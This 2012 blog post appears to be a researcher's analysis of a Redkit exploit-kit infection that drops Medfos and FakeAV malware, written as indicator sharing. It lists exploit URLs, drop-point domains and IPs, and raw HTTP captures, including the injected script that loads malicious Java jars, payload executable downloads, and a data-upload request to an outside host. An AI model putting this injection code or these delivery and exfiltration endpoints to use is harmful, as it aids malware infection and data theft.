Friday, December 7, 2012

Redkit, Medfos URL Detection, With Drop Points

Here's another less publicized exploit involving some interesting URLs Troj/Medfos variants. I've only started with this one, but it was interesting enough for me to share as I go.

Exploit URL Pattern:



/count17.php
/hmiq.htm
/887.jar
/332.jar
/c.htm
/newavr5.exe

/app/geoip.js
/soft4.exe
/soft3.exe

Drop points:

dangerstriangle.info
91.238.83.56
78.140.131.158/upload/fid=
megaupload.com/upload/fid=
POST /tmp2/index.php


http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Medfos-BI/detailed-analysis.aspx

Connection: close


Known Hosters:

portafi.com

hxxp://vangoluekspresgazetesi.com/887.jar. IP, 91.227.6.25
 hxxp://artindigonotecards.com/887.jar. IP, 50.63.38.1
hxxp://kouroupakis.gr/887.jar. IP, 159.253.141.42
 hxxp://istambul.co/332.jar. IP, 188.132.225.229
hxxp://yourpartytoremember.com/332.jar, 216.65.69.244


hxxp://neluzjiv.ru/newavr5.exe 174.126.147.57
hxxp://uwfekfyj.ru/newavr5.exe 86.100.103.154
hxxp://ystinqoc.ru/newavr5.exe 89.149.84.250
hxxp://mosjinme.ru/newavr5.exe 62.73.102.121
hxxp://mosjinme.ru/newavr5.exe 1.169.98.97
hxxp://pevhyvys.ru/newavr5.exe 89.147.116.106
hxxp://niliqrix.ru/newavr5.exe 70.75.89.14
hxxp://wetifjam.ru/newavr5.exe 76.108.174.97
hxxp://lupylzum.ru/newavr5.exe 37.229.17.6
ttp://votqygiq.ru/newavr5.exe 189.55.48.176
hxxp://niliqrix.ru/newavr5.exe 176.226.169.105
hxxp://wetifjam.ru/newavr5.exe 46.36.139.253

http://jsunpack.jeek.org/?report=7ceaf78be0bab306c12d2217137ca1991aee92fb







Entry point in this case /count17.php hosted on 50.8.225.255 (tahfifak.ru)


GET /count17.php HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Referer: http://www.tuvalclima.com/tuberias.html
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: tahfifak.ru
Connection: Keep-Alive

HTTP/1.1 302 
Server: Apache
Content-Length: 0
Content-Type: 
Last-Modified: .., 02 ... 2012 22:52:20 GMT
Accept-Ranges: bytes
Server:nginx/0.8.34
Date:Sun, 02 Dec 2012 22:52:41 GMT
X-Powered-By:PHP/5.3.2
Location:http://bulow-duus.dk/hmiq.html


Wonderful, redirect to hmiq.html

GET /hmiq.htm HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Referer: http://www.tuvalclima.com/tuberias.html
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: portafi.com



HTTP/1.1 200 OK
Date: Sun, 02 Dec 2012 22:52:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Refresh: 12; URL=http://syenial.com/links/1.php
Content-Length: 12938
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: text/html

<html><body><td>Anona th she i vo doth dode hasme smevo has dedo she s an demeun.</td><script type="text/javascript">document.write('<applet archive="http://portafi.com/332.jar" code="Runs.class"><param name="elitken" value="lvmomiingm0domiingtvromiingh9bomiing.f6omiing3lhomiing3v0omiing/0xomiingmh2omiingo4xomiingc6lomiing.4qomiingi2aomiingfzfomiinga0momiingtdqomiingr2homiingofsomiingplbomiing/z8omiing/lxomiing:i9omiingprgomiingt3womiingt6romiingh2pomiing"></applet>');document.write('<applet archive="http://portafi.com/887.jar" code="Runs.class"><param name="elitken" value="l20omiingml1omiingt9homiinghboomiing.ydomiing141omiing4lbomiing/yhomiingmf6omiingo81omiingc9yomiing.aeomiingicyomiingfp0omiingac8omiingtbbomiingr2eomiingoztomiingpt9omiing/v8omiing/12omiing:deomiingp51omiingtgpomiingt9gomiingh03omiing"></applet>');.    var xcioior=document.createElement("iframe");

Interesting because this looks extremely similar to Blackhole 2.0's method of passing param name= along with a following value=. The interesting part of this is the direct jars reference by the kit.

So as quickly as my system can, it runs to get those files, both of them.

GET /887.jar HTTP/1.1
accept-encoding: pack200-gzip, gzip
content-type: application/x-java-archive
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_29
Host: portafi.com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

What happens next is fun. My system makes a get request for c.htm twice. The first one is a binary and the second one is not.

GET /c.htm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; InfoPath.2)
Host: deportivistasbrigantium.com
Cache-Control: no-cache


And here is the response:


HTTP/1.1 200 OK
Date: Sun, 02 Dec 2012 22:52:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Mon, 20 Aug 2002 02:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
Content-Transfer-Encoding: binary
Content-Disposition: inline; filename=1.exe
Content-Length: 41984
Content-Type: application/octet-stream

.............W..T..........................................................L..Th%. p..gr.. c..no..be..un..n ..S ..de..

........1..)e..ze..zU..z...z...z...zN..z..Cz...z...z...z...z...z..chu.




GET /c.htm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; InfoPath.2)
Host: deportivistasbrigantium.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sun, 02 Dec 2012 22:53:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Content-Length: 123
Content-Type: text/html

..6........6...p;..2oS_
."..*(.R.`]....7...'..k......W..[..&.uX..Bk..4lI..D.%_.t?6q9...|.........R.....E.erZ5:v{..
.I.....,


And the sleigh ride continues....
No referrer, no user agent - down and dirty get request.


GET /newavr5.exe HTTP/1.0
Host: otxolpow.ru


HTTP/1.1 200 
Server: Apache
Content-Length: 769536
Content-Type: 
Last-Modified: .., 02 ... 2012 22:52:58 GMT
Accept-Ranges: bytes
Server:nginx/0.8.34
Date:Sun, 02 Dec 2012 22:52:55 GMT
Last-Modified:Sun, 02 Dec 2012 22:30:45 GMT
Accept-Ranges:bytes

MZ......................@...................................|...........!..L.!..This program must be run under Win32

I'm not alone in my fun.



They want to know where I am:

GET /app/geoip.js HTTP/1.0
Host: j.maxmind.com
Connection: close



HTTP/1.0 200 OK
Expires: Sun, 02 Dec 2012 23:22:57 GMT
Cache-Control: private, max-age=0
Content-Type: text/javascript; charset=ISO-8859-1
Access-Control-Allow-Origin: *
Content-Length: 512



function geoip_country_code() { return 'US'; }
function geoip_country_name() { return 'United States'; }
function geoip_city()         { return 'Funtown'; }
function geoip_region()       { return ''; }
function geoip_region_name()  { return ''; }
function geoip_latitude()     { return ''; }
function geoip_longitude()    { return ''; }
function geoip_postal_code()  { return ''; }
function geoip_area_code()    { return ''; }
function geoip_metro_code()   { return ''; }


Now.. Presumably posting some interesting data about my worthless system.



GET /upload/fid=BwCRAAEAP9gAAAEFCBcAAAAAAAAAAAAAAAAAAACQDAwBCwAAAM7PVN7iEdI8rLhxgiZvmW-K27tQAADBnDGDr58fgsdvmoWKlzES39DNAcB23-I_2AAAY3FwZmp4fXVkcmlocHoDBAUGAQITkSInJ26U9wAAAAAAAQcAAAAHAAAANFYA HTTP/1.1
Host: megaupload.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cache-Control: no-cache












2 comments:

  1. Hi! Some more payloads, here:

    h00p://sukbewli.ru/newavr5.exe Kazy https://www.virustotal.com/file/6bf444a638ed676bbaad4069c75b77b16358528ac20742f3b5aa36daf54c740d/analysis/
    h00p://neluzjiv.ru/newavr5.exe FakeAV https://www.virustotal.com/file/3a2194071ac42b56af6a09146472f05158fbff9543be183f7a84212dced522fb/analysis/
    h00p://rizsebym.ru/newavr3.exe FakeAV https://www.virustotal.com/file/50e7a2dcb26bfe2b984df9e15043e99fbd800247b6e86f08f5767334a1b23037/analysis/
    h00p://votqygiq.ru/newavr3.exe Klihos https://www.virustotal.com/file/e866ddd2bfa316692c5562141584f1c1399fe6ee8f8cca9687a7ff6794015ba9/analysis/
    h00p://nobzekyx.ru/newavr3.exe FakeAV https://www.virustotal.com/file/a5ab84baef7e9c8d0947dfdc5d0e67d488c20e88273c1891cff5ee1a580cf2d2/analysis/
    h00p://pevhyvys.ru/newavr3.exe Klihos https://www.virustotal.com/file/db76cdc7d9dd81b425d11d96fd60ed404617b3fb46eca18159bb17f0c7116205/analysis/
    h00p://sesuhror.ru/newavr3.exe Klihos https://www.virustotal.com/file/61fe2e7f2efeac0c503dce3b5afbfe67464fc76b0982c856f1795baf8527a54f/analysis/

    ReplyDelete